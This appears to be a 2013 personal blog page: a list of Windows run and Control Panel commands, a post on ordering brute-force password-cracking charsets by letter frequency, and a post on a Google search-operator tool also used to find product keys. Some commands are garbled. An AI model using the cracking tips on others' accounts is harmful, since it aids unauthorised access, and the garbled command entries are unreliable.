fsmgmt.msc = share folder manager
gpedit.msc = group policy editor
lusrmgr.msc = local users and groups
ntmsmgr.msc = removable storage
ntmsoprq.msc = removable storage operator requests
perfmon.msc = performance monitor
rsop.msc = resultant set of policy
secpol.msc = local security settings
services.msc = services
wmimgmt.msc = windows management instrumentation

conf = netmeeting
calc = calculator
clipbrd = clipbook viewer
charmap = character mapping table
chkdsk.exe = check disk
cmd = command prompt
cleanmgr = clean disk
dxdiag = check DirectX information
dcomcnfg = component services
eudcedit = private character editor
logoff = logoff
mem.exe = memory usage
msconfig.exe = system configuration
mplayer2 = windows media player
mspaint = paint
mstsc = remote desktop
magnify = magnify
mmc = microsoft management console
mobsync = synchronize setting
notepad = notepad
ntbackup = backup or restore wizard
narrator = narrator
osk = on screen keyboard
odbcad32 = ODBC data source administrator
packager = object packager
regedit.exe = registry
rononce -p = shutdown (15secs)
regedt32 = registry editor
sysedit = system configuration editor
sigverif = file signature verification
sndrec32 = sound recorder
shrpubw = create shared folder wizard
syskey = encrypt windows
Sndvol32 = volume control
sfc.exe = resource checker
tsshutdn = shutdown (60secs)
taskmgr = task manager
tourstart = xp tour
utilman = ease of access center
winchat = windows chat
winver = check windows version
winmsd = check system information
wupdmgr = windows update manager
wscript = windows script host
write = word pad

Control userpasswords2
Control access.cpl
Control appwiz.cpl
Control bthprops.cpl
Control desk.cpl
Control hdwwiz.cpl
Control inetcpl.cpl
Control firewall.cpl
Control intl.cpl
Control irprops.cpl
Control joy.cpl
Control main.cpl
Control mmsys.cpl
Control ncpa.cpl
Control netsetup.cpl
Control nusrmgr.cpl
Control nvtuicpl.cpl
Control odbccp32.cpl ODBC
Control powercfg.cpl
Control sysdm.cpl
Control telephon.cpl
Control timedate.cpl
Control wscui.cpl Windows
Control wuaucpl.cpl

shell:Common Administrative Tools
shell:Administrative Tools
shell:SystemX86 System32
shell:My Pictures
shellrofile %userprofile%
shellrogramFiles %programfiles%
shell:Windows %windir%
shellocal AppData
shell:Common Documents
shell:Common Templates
shell:Common AppData
shell:Common Favorites
shell:Common Desktop
shell:Common Menu
shell:Common Programs
shell:Common Startup
shell:ControlPanelFolder Control

Monday, June 3, 2013

Enhance Brute Force Attack Charset

Choosing a custom charset of 0123456789abcdefghijklmnopqrstuvwxyz you'll get passwords much faster than the standard a-z0-9 charset. With a charset of a-z0-9, password cracking program will tries aaaaaaa baaaaaa caaaaaa and so on.

But with 0-9a-z, program will try 00000000 10000000 2000000 and so on - so you'll get the passwords with numbers at the end first. In other words, whereas the default numbers-last charsets will only reach the passwords with numbers at the end after almost the maximum time, a custom charset with numbers first will start with passwords with numbers at the end. It's not much but I find it does help.

Another common technique is use eatoinsrhldcumfpgwybvkxjqz instead abcdefghijklmnopqrstuvwxyz.

Everyone knows that 'e' is the most commonly used letter in the english language, so it makes sense to try it before the less commonly used letters. In fact, 'j', 'q' and 'z' are so uncommon, I sometimes leave them off the list altogether since it makes such a significant improvement on cracking time.

Sunday, June 2, 2013

Google Hacks

Almost all the internet user would recognize one of the popular search engine, the "GOOGLE". By utilizing various search operator that already provided in Google Search Engine, we could make our search result become more accurate. Therefore, an application named "Google Hacks" appear to help users to facilitate the search function of Google.

What is Google Hack? Google Hacks is an open source application that can be used as an aid in searching through Google. Search music, ebooks, videos, product key, the lyrics, the font is part of the basic search function to do with this program. Enter keywords and click the options provided, then Google Hacks will weave keywords with search operators and displays Google results pages through the browser. If we are lucky, we will get what we are looking for.